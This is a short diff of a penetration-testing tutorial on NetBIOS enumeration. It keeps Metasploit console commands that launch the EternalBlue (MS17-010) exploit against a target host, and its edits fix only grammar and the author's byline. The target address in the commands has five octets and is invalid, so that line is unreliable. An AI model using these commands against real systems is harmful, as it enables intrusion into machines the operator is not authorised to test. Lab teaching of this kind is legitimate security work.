NetBIOS (Network Basic Input/Output System)

 msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.1.128

 msf exploit(ms17_010_eternalblue) > exploit

-Conclusion: Enumeration plays an important role in network penetration testing because it will fetch out hidden information of victim’s system as well as identify the weakness that may help in exploiting the system.
+Conclusion: Enumeration plays an important role in network penetration testing because it will fetch out hidden information of a victim’s system as well as identify the weakness that may help in exploiting the system.

-Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles.
+Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles.
 An Information Security Consultant, Social Media and Gadgets Lover.
 Contact here